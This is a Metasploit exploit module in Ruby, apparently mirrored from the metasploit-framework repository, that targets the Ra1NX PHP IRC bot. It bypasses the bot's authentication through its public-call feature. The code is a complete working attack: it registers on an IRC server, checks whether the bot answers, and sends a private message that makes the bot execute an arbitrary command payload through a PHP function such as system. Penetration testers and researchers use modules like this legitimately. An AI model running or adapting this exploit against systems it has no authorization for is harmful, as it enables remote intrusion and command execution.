Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb
19848 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Ra1NX PHP Bot PubCall Authentication Bypass Remote Code Execution',

16
        'Description' => %q{

17
          This module allows remote command execution on the PHP IRC bot Ra1NX by

18
          using the public call feature in private message to covertly bypass the

19
          authentication system.

20
        },

21
        'Author' => [

22
          'bwall <bwall[at]openbwall.com>' # Ra1NX analysis and Metasploit module

23
        ],

24
        'License' => MSF_LICENSE,

25
        'References' => [

26
          ['OSVDB', '91663'],

27
          ['URL', 'https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot'],

28
          ['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0'],

29
          ['URL', 'http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b']

30
        ],

31
        'Platform' => %w{unix win},

32
        'Arch' => ARCH_CMD,

33
        'Payload' => {

34
          'Space' => 344,

35
          'BadChars' => '',

36
          'DisableNops' => true,

37
          'Compat' =>

38
                        {

39
                          'PayloadType' => 'cmd'

40
                        }

41
        },

42
        'Targets' => [

43
          ['Ra1NX / Unix', { 'Platform' => 'unix' } ],

44
          ['Ra1NX / Windows', { 'Platform' => 'win' } ]

45
        ],

46
        'Privileged' => false,

47
        'DisclosureDate' => '2013-03-24',

48
        'DefaultTarget' => 0,

49
        'Notes' => {

50
          'Reliability' => UNKNOWN_RELIABILITY,

51
          'Stability' => UNKNOWN_STABILITY,

52
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

53
        }

54
      )

55
    )

56


57
    register_options(

58
      [

59
        Opt::RPORT(6667),

60
        OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),

61
        OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),

62
        OptString.new('RNICK', [true, 'Nickname of Target IRC Bot', 'jhl1']),

63
        OptString.new('PHP_EXEC', [true, 'Function used to call payload', 'system'])

64
      ]

65
    )

66
  end

67


68
  def post_auth?

69
    true

70
  end

71


72
  def connect_irc

73
    print_status("#{rhost}:#{rport} - Connecting to IRC server...")

74
    connect

75


76
    data = ""

77
    begin

78
      read_data = sock.get_once(-1, 1)

79
      while not read_data.nil?

80
        data << read_data

81
        read_data = sock.get_once(-1, 1)

82
      end

83
    rescue EOFError

84
    end

85


86
    if data and data =~ /020.*wait/

87
      print_good("#{rhost}:#{rport} - Connection successful, giving 3 seconds to IRC server to process our connection...")

88
      select(nil, nil, nil, 3)

89
    end

90
  end

91


92
  def check

93
    connect_irc

94


95
    response = register(sock)

96
    if response =~ /463/ or response =~ /464/

97
      vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")

98
      return Exploit::CheckCode::Unknown

99
    end

100


101
    confirm_string = rand_text_alpha(8)

102
    response = send_msg(sock, "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @msg #{datastore['NICK']} #{confirm_string}\r\n")

103


104
    quit(sock)

105
    disconnect

106


107
    if response =~ /#{confirm_string}/

108
      return Exploit::CheckCode::Vulnerable

109
    else

110
      return Exploit::CheckCode::Safe

111
    end

112
  end

113


114
  def send_msg(sock, data)

115
    sock.put(data)

116
    data = ""

117
    begin

118
      read_data = sock.get_once(-1, 1)

119
      while not read_data.nil?

120
        data << read_data

121
        read_data = sock.get_once(-1, 1)

122
      end

123
    rescue EOFError

124
    end

125
    data

126
  end

127


128
  def register(sock)

129
    msg = ""

130


131
    if datastore['IRC_PASSWORD'] and not datastore['IRC_PASSWORD'].empty?

132
      msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"

133
    end

134


135
    if datastore['NICK'].length > 9

136
      nick = rand_text_alpha(9)

137
      print_error("The nick is longer than 9 characters, using #{nick}")

138
    else

139
      nick = datastore['NICK']

140
    end

141


142
    msg << "NICK #{nick}\r\n"

143
    msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"

144


145
    response = send_msg(sock, msg)

146
    return response

147
  end

148


149
  def ra1nx_command(sock)

150
    encoded = payload.encoded

151
    command_msg = "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @#{datastore['PHP_EXEC']} #{encoded}\r\n"

152
    response = send_msg(sock, command_msg)

153
    return response

154
  end

155


156
  def quit(sock)

157
    quit_msg = "QUIT :bye bye\r\n"

158
    sock.put(quit_msg)

159
  end

160


161
  def exploit

162
    connect_irc

163


164
    print_status("#{rhost}:#{rport} - Registering with the IRC Server...")

165
    response = register(sock)

166
    if response =~ /463/ or response =~ /464/

167
      print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")

168
      return

169
    end

170


171
    print_status("#{rhost}:#{rport} - Exploiting the Ra1NX bot...")

172
    ra1nx_command(sock)

173


174
    quit(sock)

175
    disconnect

176
  end

177
end

178


179